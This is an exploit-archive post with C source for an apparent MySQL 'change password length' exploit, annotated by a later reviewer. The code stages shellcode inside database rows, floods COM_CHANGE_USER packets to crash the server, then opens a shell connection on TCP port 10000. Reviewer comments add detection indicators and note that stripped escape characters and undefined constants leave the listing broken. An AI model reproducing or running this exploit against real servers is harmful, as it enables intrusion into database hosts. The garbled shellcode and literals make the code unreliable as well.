[local exploits] - MySql version 5.2 Change password length
Posted on 03 October 2010
============================================== MySql version 5.2 Change password length shell ============================================== I know I know it's been a while, I've been that much into xss and forgot about the rest..
Mad respect Inj3ct0r, please do not remove the comment that says Note: None is allowed to post this to exploit-db.com
/* MySql version 5.2 Change password length shell
 *
 * Usage: ./mysqlexploit -h localhost -u boof -p boof -t user -d mydb -g port
 *
 * Tested on: MySql 5.2 other versions may be variable
 *
 * Greetings to: Inj3ctOr ; Sid3^effects ; L0rd CrusAd3r ;indoushka ; The_Exploited ; Eidelweiss
 *
 * Note: None is allowed to post this to exploit-db.com
 *
 * Tested on: MySql 5.2 other versions may be variable
 *
 * NOTE(review): this listing is extraction-damaged (backslashes and embedded
 * quotes were stripped from several string literals, and ROWS has no visible
 * definition), so it does not compile as shown; it is kept as an artefact for
 * analysis.  Flow as written: an already-authenticated client fills a
 * writable database with two helper tables, then loops sending
 * COM_CHANGE_USER through the raw net layer until the server stops answering,
 * at which point SIGALRM fires and do_connect() dials TCP/10000 on the host.
 * Detection points are noted on each function below.
 */
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <netdb.h>
#include <sys/time.h>
#include <resolv.h>
#include <mysql/mysql.h>
#include <signal.h>
#include <getopt.h>
/* shellcode 88 bytes*/
/* Payload bytes as published; the escapes were stripped by extraction, so
 * strlen(shellcode) in this listing is not the 88 the comment above claims. */
char *shellcode="x31x66x6Cxe3xb0x66x53x43x53x43x53x89xe1x4bxcdx80x89xc7x52x66x68x27x01x08x00x53x89xe1xb0x10x50x51x57x89xe1xb0x66xcdx80xb0x66xb3x04xcdx80x50x50x57x89xe1x43xb0x66xcdx80x89xd9x89xc3xb0x3fx49xcdx80x41xe2xf8x51x68x6ex2fx73x68x68x2fx2fx62x69x89xe3x51x53x89xe1xb0x0bxcdx80";
char db[50]="test"; /* writable database (-d): the helper tables oy and ow are created here */
char victim[100]="localhost"; /* target host (-h); also the host do_connect() dials on TCP/10000 */
int offset=0; /* -o: bytes trimmed from the padding built in populate(); capped in main() */
/* Connect to port 10000 */
/* Dials TCP/10000 on `host`, sends "uname -a; id; ", then relays stdin to
 * the socket and the socket to stdout.  Returns 0 only when connect() fails;
 * the while(1) loop below has no exit, so `return 1` is unreachable and the
 * function only ends via exit(2) on a recv() error.  `he` is dereferenced
 * without a NULL check, so an unresolvable hostname crashes here.
 * Detection: the literal "uname -a; id; " is the first data on the new
 * TCP/10000 session from the attacking host — a simple network signature. */
int do_connect(char *host)
{
    struct hostent *he=gethostbyname(host);
    struct sockaddr_in sa;
    int outsocket,r;
    struct timeval tv;
    fd_set rfds;
    char buffer[500];
    memset (&sa, 0, sizeof (struct sockaddr_in));
    memcpy (&sa.sin_addr.s_addr, he->h_addr_list[0], he->h_length);
    sa.sin_family = AF_INET;
    sa.sin_port=htons(10000);
    outsocket=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if ((connect(outsocket,(struct sockaddr *)&sa,sizeof(struct sockaddr_in)))==-1) return 0;
    FD_ZERO (&rfds);
    send(outsocket,"uname -a; id; ",14,0);
    printf("[+] Successful, Run your shell!: ");
    while (1) {
        FD_SET (outsocket, &rfds);
        FD_SET (0, &rfds);
        tv.tv_sec = 30;
        tv.tv_usec = 0;
        select (outsocket + 1, &rfds, NULL, NULL, &tv);
        if (FD_ISSET(outsocket, &rfds)) {
            if ((r=recv(outsocket, buffer, sizeof(buffer), 0))==-1) exit(2);
            write(1,buffer,r);
        }
        if (FD_ISSET(0,&rfds)) {
            r=read(0,buffer,sizeof(buffer));
            send(outsocket,buffer,r,0);
        }
    }
    return 1;
}
/* Print a silly joke! */
/* Draws a 50-column progress bar for a/max.  Declared int but returns
 * nothing, and the trailing "100% " ends in an incomplete conversion
 * specification (presumably a mangled "%%") — undefined behaviour as written. */
int nice_bar (int a,int max)
{
    int i;
    int b=a*50/max;
    printf("0 [");
    for (i=0;i<=b;i++) printf(".");
    for(;i<50;i++) printf(" ");
    printf("] 100% ");
    fflush(stdout);
}
/* Try a query in mysql server */
/* Runs `query` on `s`; on failure prints mysql_error() to stderr and exit(1)s,
 * so no caller ever observes a failed query.  Declared int but returns nothing. */
int do_query(MYSQL *s, char *query)
{
    if (mysql_query(s,query)) {
        fprintf(stderr,"Query failed (%s) ",mysql_error(s));
        exit(1);
    }
}
/* Boof the index cache */
/* Runs SELECT ... HAVING u='junk' against the helper table db.ow (created by
 * populate()) and discards the result; per the author's comment the intent is
 * to touch the index cache before each COM_CHANGE_USER.  mysql_free_result()
 * is called even when mysql_store_result() returned NULL — confirm the client
 * library tolerates that.
 * Detection: a query of this exact shape immediately before each change-user
 * packet, from the same session, is a server-side indicator. */
int do_index(MYSQL *s)
{
    char query[1000];
    MYSQL_RES *res;
    printf("[+] Boofing index cache ");
    sprintf(query, "select * from %s.ow having u='junk';",db);
    do_query(s,query);
    if (!(res=mysql_store_result(s))) {
        printf("[-] Failed index cache boof ");
    }
    mysql_free_result(res);
}
/* Collect mysql database */
/* Builds buf1 = (249 - strlen(shellcode) - offset) fill bytes followed by the
 * payload, switches to `db`, creates helper tables oy and ow, seeds oy with
 * four copies of buf1, then copies oy into the indexed table ow ROWS times.
 * The 'x90' fill constant and the INSERT format string are mangled in this
 * listing, and ROWS is defined nowhere visible.
 * Detection: CREATE TABLE oy/ow followed by a burst of INSERT ... SELECT in a
 * user-writable database, from an account that then issues COM_CHANGE_USER,
 * is the precursor pattern visible in the general or audit log. */
int populate (MYSQL *s)
{
    char buf1[300];
    char query[1000];
    int i;
    memset(buf1,0,sizeof(buf1));
    memset(query,0,sizeof(query));
    memset(buf1,'x90',249-strlen(shellcode)-offset);
    strcat(buf1,shellcode);
    printf("[+] Creating temporal tables... ");
    sprintf(query,"use %s;",db);
    do_query(s,query);
    do_query(s,"create table oy(h varchar(250),a varchar(250));");
    sprintf(query,"insert into oy(h,a) values ("%s","%s");", buf1,buf1);
    do_query(s,query);
    do_query(s,query);
    do_query(s,query);
    do_query(s,query);
    do_query(s,"create table ow(u varchar(250),d varchar(250),index(u,d));");
    printf("[+] Collecting database.. this will take a time.. 
");
    for(i=0;i<ROWS;i++) {
        do_query(s,"INSERT INTO ow(u,d) select h,a from oy;");
        nice_bar(i,ROWS);
    }
    printf(" ");
}
/* SIGALRM handler armed by main() around my_net_read(): if the server goes
 * silent for 5 s it calls do_connect(victim), presumably expecting the
 * payload to be reachable there.  do_connect() only returns on connect()
 * failure (0), so exit(1) is never reached and control goes back into the
 * interrupted read.  Its type (void *(*)(int)) does not match what signal()
 * expects, and it calls non-async-signal-safe functions (printf, select)
 * from handler context. */
void *sig_hand (int a)
{
    if(do_connect(victim)) exit(1);
}
/* Entry point: parses -h/-u/-p/-t/-d/-g/-s/-o/-n, connects with the supplied
 * credentials, optionally runs populate(), then loops forever: do_index(),
 * send COM_CHANGE_USER carrying "<other_user>\0<fixed run of 'X'>" via the raw
 * net layer, and wait up to 5 s (alarm) for the reply.  A packet_error
 * reconnects after usleep(stime) and retries; any other reply prints
 * "Attack failed!" and retries too.  The do/while(1) never ends, so
 * mysql_close() is unreachable.
 * Review notes: the password is echoed to stdout ("Pass: %s"), which leaks
 * credentials into terminal scrollback and any captured output; -s is parsed
 * with atol() into an unsigned long long, so negative input wraps; the
 * `offset>249-strlen(shellcode)` check compares int with size_t.
 * Detection: server side, one session issuing repeated COM_CHANGE_USER with an
 * identical oversized password field interleaved with reconnects; host side,
 * mysqld crashing or restarting and a new inbound TCP/10000 connection. */
int main(int argc, char **argv)
{
    MYSQL *sock,mysql;
    char abuf[10000];
    char *hashpass,pass[50]="",user[50]="",ouser[50]="root";
    int i,port=3306,opt,pop=1;
    unsigned long long int stime=1977321;
    printf("[+] MySql vuln lenght <5.x by 33[1;33SeeMe 33[0m ");
    memset (abuf,0,sizeof(abuf));
    if (argc < 2) {
        fprintf(stderr,"usage : %s -h <host> -u <user> -p <pass>" " -t <other_user> [ -d writable_db] [ -g port ]" "[ -o offset ] [ -s microsecs_sleep ] [ -n ] ",argv[0]);
        exit(1);
    }
    while((opt=getopt(argc,argv,"h:u:p:t:d:o:s:g:n"))!=EOF)
        switch(opt) {
            case 'h': strncpy(victim,optarg,49); break;
            case 'u': strncpy(user,optarg,49); break;
            case 'p': strncpy(pass,optarg,49); break;
            case 't': strncpy(ouser,optarg,49); break;
            case 'd': strncpy(db,optarg,49); break;
            case 'g': port=atoi(optarg); break;
            case 's': stime=atol(optarg); break;
            case 'o': offset=atoi(optarg);
                /* keeps the padding length in populate() non-negative */
                if (offset>249-strlen(shellcode)) {
                    printf("[-] Maximun offset: %d Aborting... ", 249-strlen(shellcode));
                    exit(-1);
                }
                break;
            case 'n': pop=0; break;
        }
    printf("[+] Do something with Params: ");
    /* credential echo: the cleartext password lands in stdout */
    printf("[+] Host: %s Port: %d User: %s Pass: %s ",victim,port,user,pass);
    printf("[+] Target_User: %s Writable_Database: %s ",ouser,db);
    printf("[+] Offset: %d Collect: %s Sleep: %llu ",offset, pop?"yes":"no",stime);
    signal(SIGALRM,sig_hand);
    printf("[+] Conecting... ");
    mysql_init(&mysql);
    if (!(sock = mysql_real_connect(&mysql,victim,user,pass, NULL,port,NULL,0))) {
        fprintf(stderr,"[-] Couldn't connect! %s ",mysql_error(&mysql));
        exit(1);
    }
    printf("[+] Connected: Version %s ",mysql_get_server_info(sock));
    printf("[+] Starting attack.. Rebuilding the base.. 
");
    /* abuf layout: target user name, NUL, then the fixed password field */
    strcpy(abuf,ouser);
    hashpass=abuf+strlen(abuf)+1;
    strcpy(hashpass,"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX");
    if (pop) populate(sock);
    do {
        do_index(sock);
        net_clear(&sock->net);
        if (net_write_command(&sock->net,COM_CHANGE_USER, abuf,strlen(abuf)+strlen(hashpass)+2)) {
            printf("[-] Can't send command to server. ");
        }
        /* 5 s without a reply raises SIGALRM -> sig_hand() -> do_connect() */
        alarm(5);
        if (my_net_read(&sock->net)==packet_error) {
            alarm(0);
            printf("[+] Packet error..;) ");
            usleep(stime);
            mysql_init(&mysql);
            if (!(sock=mysql_real_connect(&mysql,victim,user,pass, NULL,port,NULL,0))) {
                printf("[-] Something is wrong!? ");
                exit(1);
            }
        } else {
            printf("[-] Attack failed! ");
        }
        alarm(0);
    } while(1);
    mysql_close(sock);
}
# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-03]</pre></body></html>